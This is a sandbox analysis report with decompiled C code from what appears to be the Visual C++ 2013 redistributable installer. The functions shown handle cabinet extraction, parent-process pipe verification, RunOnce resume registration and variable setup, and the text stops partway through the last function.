Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandleInitialize$CriticalSection_memset$MessageMutexPostReleaseUninitializeWindow
String ID: 3.7.2829.0$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Invalid run mode.$Setup$_Failed$engine.cpp$txt
API String ID: 3679201541-1932953092
Opcode ID: 9aae1333c0bc7470c2e2349aa081611cbee9985dbd9029ce92809fd21d724b73
Instruction ID: 8cf04b141e2dbe5a8bb22690bf0a7f3555f827cdbff46b35e61c5a2ab9ddbe6a
Opcode Fuzzy Hash: 9aae1333c0bc7470c2e2349aa081611cbee9985dbd9029ce92809fd21d724b73
Instruction Fuzzy Hash: E5B1867192222B9FDF21BF64CCC1BFD76B5AB58340F4404EAE209A71C1DA714EA28F51

Uniqueness

Uniqueness Score: -1.00%

Function 012A6231 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 012A6256
#20.CABINET(012A594A,012A5959,012A5D1C,012A5F23,012A5966,012A60F1,012A5FB8,000000FF,?), ref: 012A62B2
CoUninitialize.OLE32 ref: 012A645E

Strings

Invalid operation for this state., xrefs: 012A643D
Failed to wait for begin operation event., xrefs: 012A63D9
Failed to extract all files from container., xrefs: 012A6350
<the>.cab, xrefs: 012A62F4
Failed to set operation complete event., xrefs: 012A6393
cabextract.cpp, xrefs: 012A62CC, 012A6389, 012A63CF, 012A640C, 012A6433
Failed to initialize cabinet.dll., xrefs: 012A62D6
Failed to reset begin operation event., xrefs: 012A6416
Failed to initialize COM., xrefs: 012A6262

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container.$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-3821814080
Opcode ID: 85ae6d682a62c932e90c248871d1a710c4f297671f67d8c1bf97bb42c88844fc
Instruction ID: c8d52d8a7f2dc61bfee57ac3e699d5a420f9fb662c458ea414d2e199d452ebe1
Opcode Fuzzy Hash: 85ae6d682a62c932e90c248871d1a710c4f297671f67d8c1bf97bb42c88844fc
Instruction Fuzzy Hash: E6515C32AB0313BBD7305BA99D4AE6F7AA59F00F60B9D023CEB05B7240D7A49D0087D0

Uniqueness

Uniqueness Score: -1.00%

Function 01283156 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 183
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E01283156(void* _a4, short* _a8, intOrPtr* _a12) {
				struct _OVERLAPPED* _v8;
				void _v12;
				long _v16;
				void _v20;
				long _v24;
				void _v28;
				int _t32;
				int _t39;
				intOrPtr _t44;
				signed int _t50;
				signed int _t56;
				signed int _t60;
				signed int _t64;
				intOrPtr* _t68;
				signed int _t71;
				signed int _t73;

				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_v28 = GetCurrentProcessId();
				_v24 = 0;
				_t32 = ReadFile(_a4,  &_v12, 4,  &_v16, 0); // executed
				if(_t32 != 0) {
					_t34 = _v12 >> 1;
					if(_v12 >> 1 <= 0xff) {
						_t71 = E012B00D8( &_v8, _t34 + 1);
						if(_t71 >= 0) {
							_t39 = ReadFile(_a4, _v8, _v12,  &_v16, 0); // executed
							if(_t39 != 0) {
								if(CompareStringW(0, 0, _v8, 0xffffffff, _a8, 0xffffffff) == 2) {
									if(ReadFile(_a4,  &_v20, 4,  &_v16, 0) != 0) {
										_t68 = _a12;
										_t44 =  *_t68;
										if(_t44 != 0) {
											if(_t44 == _v20) {
												goto L27;
											} else {
												_t73 = 0x8007000d;
												_t71 = 0x8007000d;
												E012B294E(_t44, "pipe.cpp", 0x386, 0x8007000d);
												_push("Verification process id from parent does not match.");
												goto L8;
											}
										} else {
											 *_t68 = _v20;
											L27:
											if(WriteFile(_a4,  &_v28, 4,  &_v24, 0) == 0) {
												_t50 = GetLastError();
												if(_t50 > 0) {
													_t50 = _t50 & 0x0000ffff | 0x80070000;
												}
												_t71 = _t50;
												if(_t71 >= 0) {
													_t71 = 0x80004005;
												}
												E012B294E(_t50, "pipe.cpp", 0x38c, _t71);
												_push("Failed to inform parent process that child is running.");
												goto L33;
											}
										}
									} else {
										_t56 = GetLastError();
										if(_t56 > 0) {
											_t56 = _t56 & 0x0000ffff | 0x80070000;
										}
										_t71 = _t56;
										if(_t71 >= 0) {
											_t71 = 0x80004005;
										}
										E012B294E(_t56, "pipe.cpp", 0x37b, _t71);
										_push("Failed to read verification process id from parent pipe.");
										goto L33;
									}
								} else {
									_t73 = 0x8007000d;
									_t71 = 0x8007000d;
									E012B294E(_t40, "pipe.cpp", 0x375, 0x8007000d);
									_push("Verification secret from parent does not match.");
									goto L8;
								}
							} else {
								_t60 = GetLastError();
								if(_t60 > 0) {
									_t60 = _t60 & 0x0000ffff | 0x80070000;
								}
								_t71 = _t60;
								if(_t71 >= 0) {
									_t71 = 0x80004005;
								}
								E012B294E(_t60, "pipe.cpp", 0x36e, _t71);
								_push("Failed to read verification secret from parent pipe.");
								goto L33;
							}
						} else {
							_push("Failed to allocate buffer for verification secret.");
							goto L33;
						}
					} else {
						_t73 = 0x8007000d;
						_t71 = 0x8007000d;
						E012B294E(_t34, "pipe.cpp", 0x366, 0x8007000d);
						_push("Verification secret from parent is too big.");
						L8:
						_push(_t73);
						goto L34;
					}
				} else {
					_t64 = GetLastError();
					if(_t64 > 0) {
						_t64 = _t64 & 0x0000ffff | 0x80070000;
					}
					_t71 = _t64;
					if(_t71 >= 0) {
						_t71 = 0x80004005;
					}
					E012B294E(_t64, "pipe.cpp", 0x360, _t71);
					_push("Failed to read size of verification secret from parent pipe.");
					L33:
					_push(_t71);
					L34:
					E012AFA86();
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t71;
			}

0x01283161
0x01283164
0x01283167
0x0128316a
0x0128317a
0x0128318a
0x0128318d
0x01283191
0x012831cf
0x012831d6
0x01283205
0x01283209
0x01283223
0x01283227
0x01283277
0x012832ac
0x012832e4
0x012832e7
0x012832eb
0x0128335f
0x00000000
0x01283361
0x01283361
0x01283371
0x01283373
0x01283378
0x00000000
0x01283378
0x012832ed
0x012832f0
0x012832f2
0x01283308
0x0128330a
0x01283312
0x01283319
0x01283319
0x0128331e
0x01283322
0x01283324
0x01283324
0x01283334
0x01283339
0x00000000
0x01283339
0x01283308
0x012832ae
0x012832ae
0x012832b6
0x012832bd
0x012832bd
0x012832c2
0x012832c6
0x012832c8
0x012832c8
0x012832d8
0x012832dd
0x00000000
0x012832dd
0x01283279
0x01283279
0x01283289
0x0128328b
0x01283290
0x00000000
0x01283290
0x01283229
0x01283229
0x01283231
0x01283238
0x01283238
0x0128323d
0x01283241
0x01283243
0x01283243
0x01283253
0x01283258
0x00000000
0x01283258
0x0128320b
0x0128320b
0x00000000
0x0128320b
0x012831d8
0x012831d8
0x012831e8
0x012831ea
0x012831ef
0x012831f4
0x012831f4
0x00000000
0x012831f4
0x01283193
0x01283193
0x0128319b
0x012831a2
0x012831a2
0x012831a7
0x012831ab
0x012831ad
0x012831ad
0x012831bd
0x012831c2
0x0128333e
0x0128333e
0x0128333f
0x0128333f
0x01283345
0x01283349
0x0128334e
0x0128334e
0x01283359

APIs

GetCurrentProcessId.KERNEL32(8000FFFF,00000000,76CDF7C0,?,01283983,?,?,00000008,00000000,?), ref: 0128316D
ReadFile.KERNELBASE(00000008,00000008,00000004,?,00000000,?,01283983,?,?,00000008,00000000,?), ref: 0128318D
GetLastError.KERNEL32(?,01283983,?,?,00000008,00000000,?), ref: 01283193
ReadFile.KERNELBASE(00000008,00000000,00000008,?,00000000,00000000,00000009,?,01283983,?,?,00000008,00000000,?), ref: 01283223
GetLastError.KERNEL32(?,01283983,?,?,00000008,00000000,?), ref: 01283229

Strings

Verification secret from parent does not match., xrefs: 01283290
Failed to allocate buffer for verification secret., xrefs: 0128320B
Verification secret from parent is too big., xrefs: 012831EF
Failed to inform parent process that child is running., xrefs: 01283339
Failed to read size of verification secret from parent pipe., xrefs: 012831C2
pipe.cpp, xrefs: 012831B8, 012831E3, 0128324E, 01283284, 012832D3, 0128332F, 0128336C
Verification process id from parent does not match., xrefs: 01283378
Failed to read verification process id from parent pipe., xrefs: 012832DD
Failed to read verification secret from parent pipe., xrefs: 01283258

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastRead$CurrentProcess
String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$pipe.cpp
API String ID: 1233551569-826945260
Opcode ID: 73724afac3919d67cc0e829f304bf834ccec8ec287de60b405d889cb4c1c4a4e
Instruction ID: ee6b849226140106a03bb3b70db6fc083b84bb9d613249aa6a74c9d17351fbb9
Opcode Fuzzy Hash: 73724afac3919d67cc0e829f304bf834ccec8ec287de60b405d889cb4c1c4a4e
Instruction Fuzzy Hash: 95510872571207BBDB21EA959CC6EBE7A79FB40B90F244029F610F7180D675CA0187A1

Uniqueness

Uniqueness Score: -1.00%

Function 01286893 Relevance: 31.7, APIs: 3, Strings: 15, Instructions: 166
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E01286893(void* __eax, void* __ecx, void* __edx, void* __esi, void* _a4, signed int _a8) {
				void* _v8;
				char _v12;
				signed int _t36;
				signed int _t40;
				signed int _t44;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				void* _t56;
				void* _t62;
				signed int _t65;
				void* _t67;

				_t67 = __esi;
				_t62 = __edx;
				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t56 = __eax;
				_v8 = 0;
				_v12 = 0;
				_push(E01291879( *((intOrPtr*)(__esi + 8))));
				_push(E01291879(_a8));
				_push(E01291A53(_t56));
				E01281566(2, 0x20000173,  *((intOrPtr*)(__esi + 0x50))); // executed
				if(_a4 == 0) {
					L6:
					__eflags = _t56 - 1;
					if(_t56 == 1) {
						goto L8;
					} else {
						goto L7;
					}
				} else {
					_t53 = E012B362A(_a4, L"Resume", _t56); // executed
					_t65 = _t53;
					if(_t65 >= 0) {
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							goto L6;
						} else {
							_t54 = E012B362A(_a4, L"Installed", 1); // executed
							_t65 = _t54;
							__eflags = _t65;
							if(_t65 >= 0) {
								L7:
								__eflags = _a8;
								if(_a8 == 0) {
									L17:
									_t36 = E012B378B( *((intOrPtr*)(_t67 + 0x4c)), L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0x20006,  &_v8); // executed
									_t65 = _t36;
									__eflags = _t65 - 0x80070002;
									if(_t65 == 0x80070002) {
										L27:
										_t65 = 0;
										__eflags = 0;
										goto L28;
									} else {
										__eflags = _t65 - 0x80070003;
										if(_t65 == 0x80070003) {
											goto L27;
										} else {
											_t44 = RegDeleteValueW(_v8,  *(_t67 + 0x10)); // executed
											__eflags = _t44 - 2;
											if(_t44 == 2) {
												_t44 = 0;
												__eflags = 0;
											}
											__eflags = _t44;
											if(__eflags == 0) {
												L28:
												__eflags = _a4;
												if(_a4 != 0) {
													_t40 = RegDeleteValueW(_a4, L"BundleResumeCommandLine"); // executed
													__eflags = _t40 - 2;
													if(_t40 == 2) {
														_t40 = 0;
														__eflags = 0;
													}
													__eflags = _t40;
													if(__eflags != 0) {
														if(__eflags > 0) {
															_t40 = _t40 & 0x0000ffff | 0x80070000;
															__eflags = _t40;
														}
														_t65 = _t40;
														__eflags = _t65;
														if(_t65 >= 0) {
															_t65 = 0x80004005;
														}
														E012B294E(_t40, "registration.cpp", 0x4b9, _t65);
														_push("Failed to delete resume command line value.");
														goto L37;
													}
												}
											} else {
												if(__eflags > 0) {
													_t44 = _t44 & 0x0000ffff | 0x80070000;
													__eflags = _t44;
												}
												_t65 = _t44;
												__eflags = _t65;
												if(_t65 >= 0) {
													_t65 = 0x80004005;
												}
												E012B294E(_t44, "registration.cpp", 0x4af, _t65);
												_push("Failed to delete run key value.");
												goto L37;
											}
										}
									}
								} else {
									L8:
									__eflags =  *(_t67 + 8);
									if( *(_t67 + 8) != 0) {
										goto L17;
									} else {
										_push(L"burn.runonce");
										_t65 = E012B177A( &_v12, L"\"%ls\" /%ls",  *((intOrPtr*)(_t67 + 0x54)));
										__eflags = _t65;
										if(_t65 >= 0) {
											_t50 = E012B36CB( *((intOrPtr*)(_t67 + 0x4c)), L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0x20006,  &_v8); // executed
											_t65 = _t50;
											__eflags = _t65;
											if(_t65 >= 0) {
												_t51 = E012B3B02(_t59, _t62, _v8,  *(_t67 + 0x10), _v12); // executed
												_t65 = _t51;
												__eflags = _t65;
												if(_t65 >= 0) {
													_t52 = E012B3B02(_t59, _t62, _a4, L"BundleResumeCommandLine",  *((intOrPtr*)(_t67 + 0x58))); // executed
													_t65 = _t52;
													__eflags = _t65;
													if(_t65 < 0) {
														_push("Failed to write resume command line value.");
														goto L37;
													}
												} else {
													_push("Failed to write run key value.");
													goto L37;
												}
											} else {
												_push("Failed to create run key.");
												goto L37;
											}
										} else {
											_push("Failed to format resume command line for RunOnce.");
											goto L37;
										}
									}
								}
							} else {
								_push("Failed to write Installed value.");
								goto L37;
							}
						}
					} else {
						_push("Failed to write Resume value.");
						L37:
						_push(_t65);
						E012AFA86();
					}
				}
				if(_v12 != 0) {
					E012B01E8(_v12);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8); // executed
				}
				return _t65;
			}

0x01286893
0x01286893
0x01286893
0x01286896
0x01286897
0x0128689f
0x012868a1
0x012868a4
0x012868ac
0x012868b5
0x012868bc
0x012868c7
0x012868d2
0x01286916
0x01286916
0x01286919
0x00000000
0x00000000
0x00000000
0x00000000
0x012868d4
0x012868dd
0x012868e2
0x012868e6
0x012868f2
0x012868f5
0x00000000
0x012868f7
0x01286901
0x01286906
0x01286908
0x0128690a
0x0128691b
0x0128691b
0x0128691f
0x012869c0
0x012869d1
0x012869dc
0x012869de
0x012869e4
0x01286a2f
0x01286a2f
0x01286a2f
0x00000000
0x012869e6
0x012869e6
0x012869ec
0x00000000
0x012869ee
0x012869f4
0x012869f6
0x012869f9
0x012869fb
0x012869fb
0x012869fb
0x012869fd
0x012869ff
0x01286a31
0x01286a31
0x01286a35
0x01286a3f
0x01286a41
0x01286a44
0x01286a46
0x01286a46
0x01286a46
0x01286a48
0x01286a4a
0x01286a4c
0x01286a53
0x01286a53
0x01286a53
0x01286a58
0x01286a5a
0x01286a5c
0x01286a5e
0x01286a5e
0x01286a6e
0x01286a73
0x00000000
0x01286a73
0x01286a4a
0x01286a01
0x01286a01
0x01286a08
0x01286a08
0x01286a08
0x01286a0d
0x01286a0f
0x01286a11
0x01286a13
0x01286a13
0x01286a23
0x01286a28
0x00000000
0x01286a28
0x012869ff
0x012869ec
0x01286925
0x01286925
0x01286925
0x01286929
0x00000000
0x0128692f
0x0128692f
0x01286945
0x0128694a
0x0128694c
0x01286969
0x0128696e
0x01286970
0x01286972
0x01286987
0x0128698c
0x0128698e
0x01286990
0x012869a7
0x012869ac
0x012869ae
0x012869b0
0x012869b6
0x00000000
0x012869b6
0x01286992
0x01286992
0x00000000
0x01286992
0x01286974
0x01286974
0x00000000
0x01286974
0x0128694e
0x0128694e
0x00000000
0x0128694e
0x0128694c
0x01286929
0x0128690c
0x0128690c
0x00000000
0x0128690c
0x0128690a
0x012868e8
0x012868e8
0x01286a78
0x01286a78
0x01286a79
0x01286a7f
0x012868e6
0x01286a84
0x01286a89
0x01286a89
0x01286a92
0x01286a97
0x01286a97
0x01286aa2

APIs

RegCloseKey.KERNELBASE(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000,00000000,00000000,?,?), ref: 01286A97

Part of subcall function 012B362A: RegSetValueExW.KERNELBASE(?,00020006,00000000,00000004,012868E2,00000004,00000001,?,012868E2,00020006,Resume,012813BB,00000000,00000000,?,?), ref: 012B363F

Strings

BundleResumeCommandLine, xrefs: 0128699F, 01286A37
Failed to format resume command line for RunOnce., xrefs: 0128694E
Failed to write Resume value., xrefs: 012868E8
registration.cpp, xrefs: 01286A1E, 01286A69
"%ls" /%ls, xrefs: 0128693A
Failed to delete run key value., xrefs: 01286A28
Failed to write run key value., xrefs: 01286992
Failed to write resume command line value., xrefs: 012869B6
Failed to delete resume command line value., xrefs: 01286A73
burn.runonce, xrefs: 0128692F
Installed, xrefs: 012868F9
Failed to write Installed value., xrefs: 0128690C
Failed to create run key., xrefs: 01286974
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01286961, 012869C9
Resume, xrefs: 012868D5

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseValue
String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.runonce$registration.cpp
API String ID: 3132538880-3648537543
Opcode ID: 838bd448e09e7703d879c440703add6b95b681c7b1e8f97146a4bc912731986c
Instruction ID: ec239c69857977cd27acf08d2e7298d54bab41515f6e997c9772ee250c5eab98
Opcode Fuzzy Hash: 838bd448e09e7703d879c440703add6b95b681c7b1e8f97146a4bc912731986c
Instruction Fuzzy Hash: 20514C319B1707BADB23BA66CCC1FFE79B6AF40390F248428F605A61D1DBB5D5519700

Uniqueness

Uniqueness Score: -1.00%

Function 0128AE56 Relevance: 30.3, APIs: 1, Strings: 19, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E0128AE56(struct _CRITICAL_SECTION* _a4) {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				void* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char* _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char* _v88;
				void* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char* _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char* _v136;
				void* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char* _v152;
				void* _v156;
				intOrPtr _v160;
				char* _v164;
				char* _v168;
				void* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char* _v184;
				void* _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				char* _v200;
				void* _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				char* _v216;
				void* _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				char* _v232;
				void* _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				char* _v248;
				void* _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				char* _v264;
				void* _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char* _v280;
				void* _v284;
				intOrPtr _v288;
				char* _v292;
				char* _v296;
				void* _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				char* _v312;
				void* _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				char* _v328;
				void* _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				char* _v344;
				void* _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				char* _v360;
				void* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				void* _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				char* _v392;
				void* _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				char* _v408;
				void* _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				char* _v424;
				void* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				void* _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				char* _v456;
				void* _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				char* _v472;
				void* _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				char* _v488;
				void* _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				char* _v504;
				void* _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				char* _v520;
				void* _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				char* _v536;
				void* _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				char* _v552;
				void* _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				char* _v568;
				void* _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				char* _v584;
				void* _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				char* _v600;
				void* _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				char* _v616;
				void* _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				char* _v632;
				void* _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				char* _v648;
				void* _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				void* _v668;
				intOrPtr _v672;
				char* _v676;
				char* _v680;
				void* _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				char* _v696;
				void* _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				char* _v712;
				void* _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				char* _v728;
				void* _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				char* _v744;
				void* _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				char* _v760;
				void* _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				char* _v776;
				void* _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				char* _v792;
				void* _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				char* _v808;
				void* _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				char* _v824;
				void* _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				char* _v840;
				void* _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				char* _v856;
				void* _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				char* _v872;
				void* _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				char* _v888;
				void* _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				char* _v904;
				void* _v908;
				char _v912;
				intOrPtr _v916;
				char* _v920;
				intOrPtr _v924;
				struct _CRITICAL_SECTION* _v928;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t243;
				struct _CRITICAL_SECTION* _t245;
				void* _t247;
				intOrPtr _t252;
				char* _t253;
				intOrPtr* _t256;
				intOrPtr _t261;
				char* _t262;
				signed int _t324;

				_t243 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t243 ^ _t324;
				_t245 = _a4;
				_v928 = _t245;
				InitializeCriticalSection(_t245);
				_v920 = L"AdminToolsFolder";
				_v912 = 0x30;
				_v916 = 0x12893dc;
				asm("stosd");
				_v904 = L"AppDataFolder";
				_v900 = 0x12893dc;
				_v896 = 0x1a;
				asm("stosd");
				_v888 = L"CommonAppDataFolder";
				_v884 = 0x12893dc;
				_v880 = 0x23;
				asm("stosd");
				_v872 = L"CommonFiles64Folder";
				_t261 = 0x2b;
				_v864 = _t261;
				_v868 = 0x1289f5c;
				asm("stosd");
				_v848 = _t261;
				_v856 = L"CommonFilesFolder";
				_v852 = 0x12893dc;
				asm("stosd");
				_v832 = _t261;
				_v840 = L"CommonFiles6432Folder";
				_v836 = 0x1289fcf;
				asm("stosd");
				_v824 = L"CompatibilityMode";
				_v816 = 0xc;
				_t262 =  &M01289049;
				_v820 = _t262;
				asm("stosd");
				_v808 = L"Date";
				_v804 = 0x1289885;
				_v800 = 0;
				asm("stosd");
				_v792 = L"ComputerName";
				_v788 = 0x1289275;
				_v784 = 0;
				asm("stosd");
				_v776 = L"DesktopFolder";
				_v772 = 0x12893dc;
				_v768 = 0;
				asm("stosd");
				_v760 = L"FavoritesFolder";
				_v756 = 0x12893dc;
				_v752 = 6;
				asm("stosd");
				_v744 = L"FontsFolder";
				_v740 = 0x12893dc;
				_v736 = 0x14;
				asm("stosd");
				_v728 = L"InstallerName";
				_v724 = 0x12899a6;
				_v720 = 0;
				asm("stosd");
				_v712 = L"InstallerVersion";
				_v708 = 0x12899d3;
				_v704 = 0;
				asm("stosd");
				_v696 = L"LocalAppDataFolder";
				_v692 = 0x12893dc;
				_v688 = 0x1c;
				asm("stosd");
				_v680 = L"LogonUser";
				_v676 =  &M01289A5A;
				_v672 = 0;
				asm("stosd");
				_v664 = L"MyPicturesFolder";
				_v660 = 0x12893dc;
				_v656 = 0x27;
				asm("stosd");
				_v648 = L"NTProductType";
				_v644 = _t262;
				_v640 = 4;
				asm("stosd");
				_v632 = L"NTSuiteBackOffice";
				_v628 = _t262;
				_v624 = 5;
				asm("stosd");
				_v616 = L"NTSuiteDataCenter";
				_v612 = _t262;
				_v608 = 6;
				asm("stosd");
				_v600 = L"NTSuiteEnterprise";
				_v596 = _t262;
				_v592 = 7;
				asm("stosd");
				_v584 = L"NTSuitePersonal";
				_v580 = _t262;
				_v576 = 8;
				asm("stosd");
				_v568 = L"NTSuiteSmallBusiness";
				_v564 = _t262;
				_v560 = 9;
				asm("stosd");
				_v552 = L"NTSuiteSmallBusinessRestricted";
				_v548 = _t262;
				_v544 = 0xa;
				asm("stosd");
				_v536 = L"NTSuiteWebServer";
				_v532 = _t262;
				_v528 = 0xb;
				asm("stosd");
				_v520 = L"PersonalFolder";
				_v516 = 0x12893dc;
				_v512 = 5;
				asm("stosd");
				_v504 = L"Privileged";
				_v500 = 0x128971f;
				_v496 = 0;
				asm("stosd");
				_v484 = 0x1289f5c;
				_t252 = 0x26;
				_v488 = L"ProgramFiles64Folder";
				_v480 = 0x1289f5c;
				asm("stosd");
				_v472 = L"ProgramFilesFolder";
				_v468 = 0x12893dc;
				_v464 = 0x1289f5c;
				asm("stosd");
				_v456 = L"ProgramFiles6432Folder";
				_v448 = _t252;
				_v452 = 0x1289fcf;
				asm("stosd");
				_v440 = L"ProgramMenuFolder";
				_v436 = 0x12893dc;
				_v432 = 2;
				asm("stosd");
				_v424 = L"RebootPending";
				_v420 = 0x1289766;
				_v416 = 0;
				asm("stosd");
				_v408 = L"SendToFolder";
				_v404 = 0x12893dc;
				_v400 = 9;
				asm("stosd");
				_v392 = L"ServicePackLevel";
				_v388 = _t262;
				_v384 = 3;
				asm("stosd");
				_v376 = L"StartMenuFolder";
				_v372 = 0x12893dc;
				_v368 = 0xb;
				asm("stosd");
				_v360 = L"StartupFolder";
				_v356 = 0x12893dc;
				_v352 = 7;
				asm("stosd");
				_v344 = L"SystemFolder";
				_v336 = 0;
				_t253 =  &M012894EF;
				_v340 = _t253;
				asm("stosd");
				_v324 = _t253;
				_v328 = L"System64Folder";
				_v320 = 1;
				asm("stosd");
				_v312 = L"SystemLanguageID";
				_v308 = 0x12897cb;
				_v304 = 0;
				asm("stosd");
				_v296 = L"TempFolder";
